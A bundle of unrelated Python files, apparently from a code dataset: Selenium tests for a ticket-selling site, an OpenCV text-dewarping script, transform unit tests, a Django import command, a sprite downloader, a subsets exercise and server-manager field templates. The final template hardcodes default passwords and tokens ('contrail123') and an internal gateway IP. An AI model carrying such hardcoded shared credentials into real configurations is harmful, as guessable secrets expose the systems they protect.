@patch('qa327.backend.get_user', return_value=test_user)
def test_date(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid date and valid name, price and quantity
self.type("#sell-name", "TESTticket4")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("201202", "12", "31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket4")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.6 For any errors, redirect back to / and show an error message
@patch('qa327.backend.get_user', return_value=test_user)
def test_redirect(self, *_):
# login to the profile
self.login_to_profile()
# enter invalid name and valid date, price and quantity
self.type("#sell-name", "TEST_ticket5")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid quantity and valid date, price and name
self.type("#sell-name", "TEST_ticket5")
self.type("#sell-quantity", "0")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid price and valid name, quantity and date
self.type("#sell-name", "TESTticket5")
self.type("#sell-quantity", "50")
self.type("#sell-price", "0")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid date and valid name, price and quantity
self.type("#sell-name", "TESTticket5")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("201202", "12", "31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# R4.7 The added new ticket information will be posted on the user profile page
@patch('qa327.backend.get_user', return_value=test_user)
def test_post_ticket(self, *_):
# login to the profile
self.login_to_profile()
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket6")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# assert the ticket posted on profile page
self.assert_text("TESTticket6")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import sys
import numpy as np
import scipy.optimize
import matplotlib.pyplot as plt
import cv2
import ellipse
DEBUG_IMAGES = []
def debug_show(name, src):
global DEBUG_IMAGES
filename = 'debug{:02d}_{}.png'.format(len(DEBUG_IMAGES), name)
cv2.imwrite(filename, src)
h, w = src.shape[:2]
fx = w/1280.0
fy = h/700.0
f = 1.0/np.ceil(max(fx, fy))
if f < 1.0:
img = cv2.resize(src, (0, 0), None, f, f, cv2.INTER_AREA)
else:
img = src.copy()
DEBUG_IMAGES.append(img)
def translation(x, y):
return np.array([[1, 0, x], [0, 1, y], [0, 0, 1]], dtype=float)
def rotation(theta):
c = np.cos(theta)
s = np.sin(theta)
return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]], dtype=float)
def perspective_warp(a, b):
return np.array([[1, 0, 0], [0, 1, 0], [a, b, 1]], dtype=float)
def slant(sx):
return np.array([[1, sx, 0], [0, 1, 0], [0, 0, 1]], dtype=float)
def softmax(x, k=1.0):
b = x.max()
return np.log( np.exp(k*(x-b)).sum() ) / k + b
def skewed_widths(contours, H):
xvals = []
for c in contours:
pts = cv2.perspectiveTransform(c, H)
x = pts[:,:,0]
xvals.append( x.max() - x.min() )
xvals = np.array(xvals)
return softmax(xvals, 0.1)
def centered_warp(u0, v0, a, b):
return np.dot(translation(u0, v0),
np.dot(perspective_warp(a, b),
translation(-u0, -v0)))
def warp_containing_points(img, pts, H, border=4, shape_only=False):
'''
display = img.copy()
for pt in pts.reshape((-1,2)).astype(int):
cv2.circle(display, tuple(pt), 4, (255, 0, 0),
-1, cv2.LINE_AA)
debug_show('warp', display)
'''
pts2 = cv2.perspectiveTransform(pts, H)
x0, y0, w, h = cv2.boundingRect(pts2)
print('got bounding rect', x0, y0, w, h)
T = translation(-x0+border, -y0+border)
TH = np.dot(T, H)
if shape_only:
return (h+2*border, w+2*border), TH
else:
dst = cv2.warpPerspective(img, TH, (w+2*border, h+2*border),
borderMode=cv2.BORDER_REPLICATE)
return dst, TH
def conic_area_discrepancy(conics, x, H, opt_results=None):
areas = []
for conic in conics:
cx = ellipse.conic_transform(conic, H)
k, ab = ellipse.conic_scale(cx)
if np.isinf(ab):
areas.append(1e20)
else:
areas.append(ab)
areas = np.array(areas)
areas /= areas.mean() # rescale so mean is 1.0
areas -= 1 # subtract off mean
rval = 0.5*np.dot(areas, areas)
if opt_results is not None:
if not opt_results or rval < opt_results[-1][-1]:
opt_results.append( (x, H, rval) )
return rval
def threshold(img):
if len(img.shape) > 2:
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
mean = img.mean()
if mean < 100:
img = 255-img
return cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY_INV, 101, 21)
def get_contours(img):
work = threshold(img)
debug_show('threshold', work)
contours, hierarchy = cv2.findContours(work, cv2.RETR_CCOMP,
cv2.CHAIN_APPROX_NONE)
return contours, hierarchy
def get_conics(img, contours, hierarchy,
abs_area_cutoff=0.0001, mean_area_cutoff=0.15):
hierarchy = hierarchy.reshape((-1, 4))
conics = []
used_contours = []
areas = []
okcontours = []
allchildren = []
pts = np.empty((0,1,2), dtype='float32')
centroid_accum = np.zeros(2)
total_area = 0.0
centroids = []
abs_area_cutoff *= img.shape[0] * img.shape[1]
print('abs_area_cutoff = ',abs_area_cutoff)
for i, (c, h) in enumerate(zip(contours, hierarchy.reshape((-1, 4)))):
next_idx, prev_idx, child_idx, parent_idx = h
if parent_idx >= 0:
continue
m = ellipse.moments_from_dict(cv2.moments(c))
if m[0] <= abs_area_cutoff:
continue
children = []
while child_idx >= 0:
child_contour = contours[child_idx]
cm = cv2.moments(child_contour)
if cm['m00'] > abs_area_cutoff:
children.append(child_contour)
allchildren.append(child_contour)
child_idx = hierarchy[child_idx][0]
if children:
work = np.zeros(img.shape[:2], dtype=np.uint8)
cv2.drawContours(work, contours, i, (1,1,1), -1)
cv2.drawContours(work, children, -1, (0,0,0), -1)
m = ellipse.moments_from_dict(cv2.moments(work, True))
centroids.append(m[1:3]/m[0])
centroid_accum += m[1:3]
total_area += m[0]
pts = np.vstack((pts, c.astype('float32')))
conic = ellipse.conic_from_moments(m)
okcontours.append(c)
conics.append(conic)
areas.append(m[0])
display = img.copy()
cv2.drawContours(display, okcontours+allchildren,
-1, (0, 255, 0),
6, cv2.LINE_AA)
debug_show('contours_only', display)
for c, a in zip(okcontours, areas):
x, y, w, h = cv2.boundingRect(c)
s = str('{:,d}'.format(int(a)))
#ctr = (x + w/2 - 15*len(s), y+h/2+10)
ctr = (x, y+h+20)
cv2.putText(display, s, ctr,
cv2.FONT_HERSHEY_SIMPLEX, 2.0,
(0, 0, 0), 12, cv2.LINE_AA)
cv2.putText(display, s, ctr,
cv2.FONT_HERSHEY_SIMPLEX, 2.0,
(0, 255, 0), 6, cv2.LINE_AA)
debug_show('contours', display)
areas = np.array(areas)
amean = areas.mean()
print('got {} contours with {} small.'.format(
len(areas), (areas < mean_area_cutoff*amean).sum()))
idx = np.where(areas > mean_area_cutoff*amean)[0]
conics = np.array(conics)
conics = conics[idx]
centroid_accum /= total_area
display = img.copy()
for conic in conics:
x0, y0, a, b, theta = ellipse.gparams_from_conic(conic)
cv2.ellipse(display, (int(x0), int(y0)), (int(a), int(b)),
theta*180/np.pi, 0, 360, (0,0,255), 6, cv2.LINE_AA)
debug_show('conics', display)
contours = [okcontours[i].astype('float32') for i in idx]
if 0:
centroids = np.array([centroids[i] for i in idx])
areas = areas[idx]
def polyfit(x, y):
coeffs = np.polyfit(x, y, deg=1)
ypred = np.polyval(coeffs, x)
ymean = np.mean(y)
sstot = np.sum((y - ymean)**2)
ssres = np.sum((y.flatten() - ypred.flatten())**2)
r2 = 1 - ssres/sstot
return coeffs, r2
xfit, xr2 = polyfit(centroids[:,0], areas)
yfit, yr2 = polyfit(centroids[:,1], areas)
xlabel = 'X coordinate (r²={:.2f})'.format(xr2)
ylabel = 'Y coordinate (r²={:.2f})'.format(yr2)
plt.plot(centroids[:,0], areas, 'b.', zorder=1)
plt.plot(centroids[:,1], areas, 'r.', zorder=1)
plt.gca().autoscale(False)
plt.plot([0, 3000], np.polyval(xfit, [0,3000]), 'b--',
zorder=0, label=xlabel)
plt.plot([0, 3000], np.polyval(yfit, [0,3000]), 'r--',
zorder=0, label=ylabel)
plt.legend(loc='upper right')
plt.xlabel('X/Y coordinate (px)')
plt.ylabel('Contour area (px²)')
plt.savefig('position-vs-area.pdf')
return conics, contours, centroid_accum
def optimize_conics(conics, p0):
x0 = np.array([0.0, 0.0])
hfunc = lambda x: centered_warp(p0[0], p0[1], x[0], x[1])
opt_results = []
f = lambda x: conic_area_discrepancy(conics, x, hfunc(x), opt_results)
res = scipy.optimize.minimize(f, x0, method='Powell')
H = hfunc(res.x)
rects = []
if 0:
phi = np.linspace(0, 2*np.pi, 16, endpoint=False)
width, height = 0, 0
for x, H, fval in opt_results:
allxy = []
for conic in conics:
Hconic = ellipse.conic_transform(conic, H)
gparams = ellipse.gparams_from_conic(Hconic)
x, y = ellipse.gparams_evaluate(gparams, phi)
xy = np.dstack((x.reshape((-1, 1, 1)), y.reshape((-1, 1, 1))))
allxy.append(xy)
allxy = np.vstack(tuple(allxy)).astype(np.float32)
rect = cv2.boundingRect(allxy)
rects.append(rect)
x, y, w, h = rect
width = max(width, w)
height = max(height, h)
border = int(0.05 * min(width, height))
width += border
height += border
aspect = float(width)/height
if aspect < 2.0:
width = 2*height
else:
height = width/2
for i, (rect, (x, H, fval)) in enumerate(zip(rects, opt_results)):
display = np.zeros((height, width), dtype=np.uint8)
x, y, w, h = rect
xoffs = width/2 - (x+w/2)
yoffs = height/2 - (y+h/2)
for conic in conics:
Hconic = ellipse.conic_transform(conic, H)
x0, y0, a, b, theta = ellipse.gparams_from_conic(Hconic)
cv2.ellipse(display, (int(x0+xoffs), int(y0+yoffs)), (int(a), int(b)),
theta*180/np.pi, 0, 360, (255,255,255), 6, cv2.LINE_AA)
cv2.putText(display, 'Area discrepancy: {:.3f}'.format(fval),
(16, height-24), cv2.FONT_HERSHEY_SIMPLEX, 2.0,
(255,255,255), 6, cv2.LINE_AA)
cv2.imwrite('frame{:04d}.png'.format(i), display)
return H
def orientation_detect(img, contours, H, rho=8.0, ntheta=512):
# ignore this, just deal with edge-detected text
pts = np.vstack(tuple(contours))
shape, TH = warp_containing_points(img, pts, H, shape_only=True)
text_edges = np.zeros(shape, dtype=np.uint8)
for contour in contours:
contour = cv2.perspectiveTransform(contour.astype(np.float32), TH)
cv2.drawContours(text_edges, [contour.astype(int)], 0, (255,255,255))
debug_show('edges', text_edges)
# generate a linspace of thetas
thetas = np.linspace(-0.5*np.pi, 0.5*np.pi, ntheta, endpoint=False)
# rho is pixels per r bin in polar (theta, r) histogram
# irho is bins per pixel
irho = 1.0/rho
# get height and width
h, w = text_edges.shape
# maximum bin index is given by hypotenuse of (w, h) divided by pixels per bin
bin_max = int(np.ceil(np.hypot(w, h)*irho))
# initialize zeroed histogram height bin_max and width num theta
hist = np.zeros((bin_max, ntheta))
# let u and v be x and y coordinates (respectively) of non-zero
# pixels in edge map
v, u = np.mgrid[0:h, 0:w]
v = v[text_edges.view(bool)]
u = u[text_edges.view(bool)]
# get center coordinates
u0 = w*0.5
v0 = h*0.5
# for each i and theta = thetas[i]
for i, theta in enumerate(thetas):
# for each nonzero edge pixel, compute bin in r direction from
# pixel location and cos/sin of theta
bin_idx = ( (-(u-u0)*np.sin(theta) # x term
+ (v-v0)*np.cos(theta))*irho # y term, both
# divided by pixels
# per bin
+ 0.5*bin_max ) # offset for center pixel
assert( bin_idx.min() >= 0 and bin_idx.max() < bin_max )
# 0.5 is for correct rounding here
#
# e.g. np.bincount([1, 1, 0, 3]) = [1, 2, 0, 1]
# returns count of each integer in the array
bc = np.bincount((bin_idx + 0.5).astype(int))
# push this into the histogram
hist[:len(bc),i] = bc
# number of zero pixels in each column
num_zero = (hist == 0).sum(axis=0)
# find the maximum number of zero pixels
best_theta_idx = num_zero.argmax()
# actual detected theta - could just return this now
theta = thetas[best_theta_idx]
# compose with previous homography
RH = np.dot(rotation(-theta), H)
if 1: # just debug visualization
debug_hist = (255*hist/hist.max()).astype('uint8')
debug_hist = cv2.cvtColor(debug_hist, cv2.COLOR_GRAY2RGB)
cv2.line(debug_hist,
(best_theta_idx, 0),
(best_theta_idx, bin_max), (255,0,0),
1, cv2.LINE_AA)
debug_show('histogram', debug_hist)
p0 = np.array((u0, v0))
t = np.array((np.cos(theta), np.sin(theta)))
warped = cv2.warpPerspective(img, TH, (shape[1], shape[0]),
borderMode=cv2.BORDER_REPLICATE)
debug_show('prerotate_noline', warped)
cv2.line(warped,
tuple(map(int, p0 - rho*bin_max*t)),
tuple(map(int, p0 + rho*bin_max*t)),
(255, 0, 0),
6, cv2.LINE_AA)
debug_show('prerotate', warped)
warped, _ = warp_containing_points(img, pts, RH)
debug_show('preskew', warped)
return RH
def skew_detect(img, contours, RH):
hulls = [cv2.convexHull(c) for c in contours]
pts = np.vstack(tuple(hulls))
display, TRH = warp_containing_points(img, pts, RH)
for h in hulls:
h = cv2.perspectiveTransform(h, TRH).astype(int)
cv2.drawContours(display, [h], 0, (255, 0, 255), 6, cv2.LINE_AA)
debug_show('convex_hulls_before', display)
f = lambda x: skewed_widths(contours, np.dot(slant(x), RH))
res = scipy.optimize.minimize_scalar(f, (-2.0, 0.0, 2.0))
SRH = np.dot(slant(res.x), RH)
warped, Hfinal = warp_containing_points(img, pts, SRH)
display = warped.copy()
for h in hulls:
h = cv2.perspectiveTransform(h, Hfinal).astype(int)
cv2.drawContours(display, [h], 0, (255, 0, 255), 6, cv2.LINE_AA)
debug_show('convex_hulls_after', display)
debug_show('final', warped)
return SRH
def main():
img = cv2.imread(sys.argv[1])
debug_show('input', img)
contours, hierarchy = get_contours(img)
conics, contours, centroid = get_conics(img, contours, hierarchy)
H = optimize_conics(conics, centroid)
RH = orientation_detect(img, contours, H)
SRH = skew_detect(img, contours, RH)
for img in DEBUG_IMAGES:
cv2.imshow('Debug', img)
while cv2.waitKey(5) < 0:
pass
if __name__ == '__main__':
main()
|
import unittest
from visuanalytics.tests.analytics.transform.transform_test_helper import prepare_test
class TestTransformLength(unittest.TestCase):
def setUp(self):
self.data = {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"],
"string": "Das ist ein Testfall",
"tuple": ("Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
}
def test_length_list(self):
values = [
{
"type": "length",
"keys": ["_req|list"],
"new_keys": ["_req|len_list"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_list": 9
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length list failed")
def test_length_string(self):
values = [
{
"type": "length",
"keys": ["_req|string"],
"new_keys": ["_req|len_string"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_string": 20
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length string failed")
def test_length_tuple(self):
values = [
{
"type": "length",
"keys": ["_req|tuple"],
"new_keys": ["_req|len_tuple"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_tuple": 9
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length tuple failed")
def test_length_dict(self):
values = [
{
"type": "length",
"keys": ["_req|dict"],
"new_keys": ["_req|len_dict"]
}
]
expected_data = {
"_req": {
"list": ["Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom",
"Z"],
"string": "Das ist ein Testfall",
"tuple": (
"Canada", "Argentina", "Cyprus", "Schweden", "Norway", "USA", "Germany", "United Kingdom", "Z"),
"dict": {"Canada": 5, "Argentina": 3, "Cyprus": 2, "Schweden": 1, "Norway": 4,
"USA": 5, "Germany": 7, "United Kingdom": 8, "Z": 10},
"len_dict": 9
}
}
exp, out = prepare_test(values, self.data, expected_data)
self.assertDictEqual(exp, out, "length dict failed")
|
from django.core.management.base import BaseCommand
from parkings.importers import PaymentZoneImporter
class Command(BaseCommand):
help = 'Uses the PaymentZoneImporter to import payment zones.'
def add_arguments(self, parser):
parser.add_argument(
'address',
type=str,
help=('Addres from where get parking areas')
)
parser.add_argument(
'type',
type=str,
default='GeoJSON',
help=('Type of data, GeoJSON or WFS')
)
parser.add_argument(
'--local',
action='store_true',
default=False,
help=('If the address refer to file on local drive')
)
def handle(self, *args, **options):
PaymentZoneImporter(
address=options['address'],
type=options['type'],
local=options['local'],
).import_payment_zones()
|
import requests
base_url_all_pkms = 'https://raw.githubusercontent.com/PokeAPI/sprites/master/sprites/pokemon/%ID%.png'
if __name__ == '__main__':
for i in range(1, 899):
url = base_url_all_pkms.replace('%ID%', str(i))
pkm_sprite = requests.get(url=url)
with open('../pokemons/sprites/' + str(i) + '.png', 'wb') as file:
file.write(pkm_sprite.content)
|
"""
File: subsets.py
Name:
-------------------------
This file prints all the sub-lists on Console
by calling a recursive function - list_sub_lists(lst).
subsets.py is a famous LeetCode Medium problem
"""
def main():
"""
LeetCode Medium Problem
"""
list_sub_lists(['a', 'b', 'c', 'd', 'a'])
def list_sub_lists(lst):
"""
:param lst: list[str], containing a number of characters
"""
list_sub_lists_helper(lst, [])
def list_sub_lists_helper(lst, chosen):
if len(lst) == 0:
print(chosen)
else:
element = lst.pop()
# Not choose and explore
list_sub_lists_helper(lst, chosen)
# Choose and explore
chosen.append(element)
list_sub_lists_helper(lst, chosen)
# Un-choose
chosen.pop()
lst.append(element)
if __name__ == '__main__':
main()
|
#validation DS
server_fields = {
"match_keys": "['id', 'mac_address', 'cluster_id', 'ip_address', 'tag', 'where']",
"obj_name": "server",
"primary_keys": "['id', 'mac_address']",
"id": "",
"host_name": "",
"mac_address": "",
"ip_address": "",
"parameters": """{
'interface_name': '',
'partition': '',
}""",
"roles": [],
"cluster_id": "",
"subnet_mask": "",
"gateway": "",
"password": "",
"domain": "",
"email": "",
"ipmi_username": "",
"ipmi_type": "",
"ipmi_password": "",
"control_data_network": "",
"bond_interface": "",
"ipmi_address": "",
"tag": None,
"base_image_id": "",
"package_image_id": ""
}
cluster_fields = {
"match_keys": "['id', 'where']",
"obj_name": "cluster",
"id": "",
"email": "",
"primary_keys": "['id']",
"base_image_id": "",
"package_image_id": "",
"parameters": """{
'router_asn': '64512',
'database_dir': '/home/cassandra',
'database_token': '',
'openstack_mgmt_ip': '',
'use_certificates': 'False',
'multi_tenancy': 'True',
'encapsulation_priority': 'MPLSoUDP,MPLSoGRE,VXLAN',
'service_token': 'contrail123',
'keystone_username': 'admin',
'keystone_password': 'contrail123',
'keystone_tenant': 'admin',
'openstack_passwd': 'contrail123',
'analytics_data_ttl': '168',
'haproxy': 'disable',
'subnet_mask': '255.255.255.0',
'gateway': '10.204.221.46',
'password': 'c0ntrail123',
'external_bgp': '',
'domain': 'contrail.juniper.net'
}"""
}
image_fields = {
"match_keys": "['id', 'where']",
"obj_name": "image",
"primary_keys": "['id']",
"id": "",
"category": "",
"type": "",
"version": "",
"path": "",
"parameters": """{
"kickstart": "",
"kickseed":""
}"""
}
email_events = ["reimage_started", "reimage_completed", "provision_started", "provision_completed"]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.